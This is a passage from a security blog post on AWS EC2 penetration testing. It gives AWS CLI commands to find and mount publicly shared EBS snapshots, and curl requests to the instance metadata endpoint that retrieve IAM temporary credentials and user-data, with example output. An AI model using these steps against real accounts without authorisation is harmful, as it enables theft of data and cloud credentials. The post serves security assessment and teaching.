As just mentioned, EBS snapshots are, by default, stored in a private AWS S3 bucket that is not directly accessible via the S3 dashboard. However, EBS snapshots are manageable via the AWS EC2 interface and their permissions can be change to be public. Needless to say, <b>you should never do that</b>.<br />
From a security perspective, if you are doing a penetration testing activity and find yourself dealing with possibly open accessible EBS snapshots, you could try to have access to the EBS block by mounting it in an EC2 instance under your control. Think of an EBS block as a virtual disk that you can mount like you would normally do. To mount an EBS block you thus need two things:<br />
<br />
<ol>
<li>an AWS EC2 instance under your control where you can mount the EBS block</li>
<li>the ID that identifies the snapshot</li>
</ol>
<br />
For (1) I recommend you check out the AWS documentation on <a href="https://docs.aws.amazon.com/efs/latest/ug/gs-step-one-create-ec2-resources.html" target="_blank">how to create and launch an EC2 instance</a>. While for (2) you can use the aws command to search for publicity accessible EBS snapshots follows:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">aws --profile [PROFILE] ec2 describe-snapshots --filters [FILTERS] --region [REGION]</span><br />
<br />
This command will respond with a JSON listing all the publicly available snapshots that satisfies the values specified by the <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">--filters</span> flag (for a complete description of the kind of filters you can use, <a href="https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-snapshots.html" target="_blank">check the documentation</a>). The JSON will contain some information about the snapshot along with the corresponding SnapshotId value that we need. For example, let's assume that we want to list all the publicly accessible snapshots containing the word <i>backup</i> in it which are located in the <i>east-us-2 </i>region, this is what we would do:<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">aws --profile default ec2 describe-snapshots --filters Name=description,Values="*backup*" --region east-us-2</span><br />
<b><br /></b>
The result of executing such command would be a JSON listing all the publicly accessible snapshots satisfying our search criteria.<br />
<br />
<br />
<!-- BEGIN JSON -->
<br />
<div style="background: #f2f2f2; border: 1px solid #8c8c8c; font-family: "courier new" , "courier" , monospace; font-size: 10pt; padding: 5px;">
{<br />
"Snapshots": [<br />
{<br />
"Description": "Phoenix_competitor_analysis_backup_set",<br />
"Encrypted": false,<br />
"VolumeId": "vol-ffffffff",<br />
"State": "completed",<br />
"VolumeSize": 100,<br />
"StartTime": "2017-08-30T05:24:48.000Z",<br />
"Progress": "100%",<br />
"OwnerId": "234190327268",<br />
"SnapshotId": "snap-0dc716aaf28921496"<br />
},<br />
{<br />
"Description": "backup",<br />
"Encrypted": false,<br />
"VolumeId": "vol-0b21c8a6c158367fc",<br />
"State": "completed",<br />
"VolumeSize": 8,<br />
"StartTime": "2018-05-21T13:01:49.000Z",<br />
"Progress": "100%",<br />
"OwnerId": "388304843501",<br />
"SnapshotId": "snap-041c06c0c3658323c"<br />
},<br />
{<br />
"Description": "backup",<br />
"Encrypted": false,<br />
"VolumeId": "vol-0ee056a878d9dfdb1",<br />
"State": "completed",<br />
"VolumeSize": 30,<br />
"StartTime": "2018-01-07T13:52:56.000Z",<br />
"Progress": "100%",<br />
"OwnerId": "682345607706",<br />
"SnapshotId": "snap-0e793674b08737e95"<br />
},<br />
{<br />
"Description": "copy of backup sprerdda - BAckup-17-8-2018",<br />
"Encrypted": false,<br />
"VolumeId": "vol-ffffffff",<br />
"State": "completed",<br />
"VolumeSize": 30,<br />
"StartTime": "2018-08-22T15:03:48.179Z",<br />
"Progress": "100%",<br />
"OwnerId": "869858413856",<br />
"SnapshotId": "snap-02326682d84d3aedd"<br />
}<br />
]<br />
}</div>
<!-- END JSON -->
<b><br /></b>
Once you have identified the snapshot of your interest, you have to create an EBS volume from that snapshot in order to be able to mount it. The following command will do just that and create an EBS volume in your account.<br />
<br />
<span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id [SNAPSHOT_ID]</span>
<br />
<br />
<div>
<span id="docs-internal-guid-eaada01b-7fff-0173-6c80-1928a9d680ea"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Finally, from your AWS console, create an EC2 instance and mount the newly created EBS volume in it.</span></span></div>
<div>
<h3>
Metadata leakage </h3>
<div>
At the beginning of this we discussed of a peculiar feature of AWS EC2 instances called Instance Metadata Service (IMS). Recall that IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or managing the running instance and is accessible from within the instance itself by querying the end-point located at <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span>.</div>
As already mentioned, many juice information can be retrieved from querying that end-point. The following table summarizes some of the most interesting one however, <a href="https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories" target="_blank">many more are available</a>.<br />
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border: 1px solid; width: 100%;">
<tbody>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/meta-data/ami-id</td>
<td style="width: 50%;">The AMI ID used to launch the instance.</td>
</tr>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/meta-data/iam/security-credentials/</td>
<td style="width: 50%;">If there is an IAM role associated it returns its name (which can be used in the next handler).</td>
</tr>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name</td>
<td style="width: 50%;">If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role (for more information, see Retrieving Security Credentials from Instance Metadata). Otherwise, not present.</td>
</tr>
<tr>
<td style="width: 50%;">http://169.254.169.254/latest/user-data</td>
<td style="width: 50%;">Returns a user-defined script which is run every time a new EC2 instance is launched for the first time.</td>
</tr>
</tbody></table>
</div>
</div>
<br />
Usage example are described in the following:<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1) # </span><span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/meta-data/ami-id" style="text-decoration: none;">http://169.254.169.254/latest/meta-data/ami-id</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ami-336b4456</span><br />
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">2) # curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/meta-data/iam/security-credentials/" style="text-decoration: none;">http://169.254.169.254/latest/meta-data/iam/security-credentials/</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">IAM_TEST_S3_READ</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">3) # curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_TEST_S3_READ" style="text-decoration: none;">http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_TEST_S3_READ</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">{</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Code" : "Success",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "LastUpdated" : "2018-08-27T15:23:14Z",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Type" : "AWS-HMAC",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "AccessKeyId" : "AS[REDACTED]TEM",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "SecretAccessKey" : "EgKirlp[REDACTED]hkYp",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Token" : "FQoGZXIvYXdzEJH//////////wE[REDACTED]=",</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> "Expiration" : "2018-08-27T21:36:24Z"</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">}</span><br />
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">4) # curl </span><span style="background-color: transparent; color: #1155cc; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="http://169.254.169.254/latest/user-data" style="text-decoration: none;">http://169.254.169.254/latest/user-data</a></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Result:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">#!/bin/bash -xe</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get update</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># install coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">apt-get install -y coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># install kms</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get update</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get install -y wget</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">echo "deb http://ubuntu.kurento.org xenial kms6" | sudo tee /etc/apt/sources.list.d/kurento.list</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">wget -O - http://ubuntu.kurento.org/kurento.gpg.key | sudo apt-key add -</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get update </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo apt-get install -y kurento-media-server-6.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">systemctl enable kurento-media-server-6.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># enable coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo echo TURNSERVER_ENABLED=1 > /etc/default/coturn</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># turn config file</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo cat >/etc/turnserver.conf<<-EOF</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[...]</span><br />
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "courier new"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sudo /usr/local/bin/cfn-signal -e $? --stack arn:aws:cloudformation:us-east-2:118366151276:stack/KurentoMinded/3cbb23a0-3d77-11e8-953d-503f3157b035 --resource WaitCondition --region us-east-2</span></div>
<br />
To take advantage of such juice information, the attacker has to find a way to query <span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace;">http://169.254.169.254</span> from within the EC2 instance itself. There are many ways in which this can be accomplished from being able to find a Server Side Request Forgery (SSRF) vulnerability, or exploit a proxy setup on the EC2 instance all the way to DNS rebinding as described by <a href="https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/" target="_blank">Alexandre Kaskasoli</a>.<br />
<br />
<h2>
Conclusion of Part 2</h2>
<div>
AWS EC2 is undeniably a powerful service that many companies are taking advantage of. As described above, the security of an AWS EC2 instance is crucial to keep a company safe from malicious attackers. This post wrapped up the main security issues related to AWS EC2 instances and how security experts can test the presence of such issues during an assessment.</div>
<style type="text/css">
td {
border: 1px solid;
padding:5px;
}
table{
border-collapse: collapse;
}
</style>
Federico De Meohttp://www.blogger.com/profile/13823957133316817764noreply@blogger.com0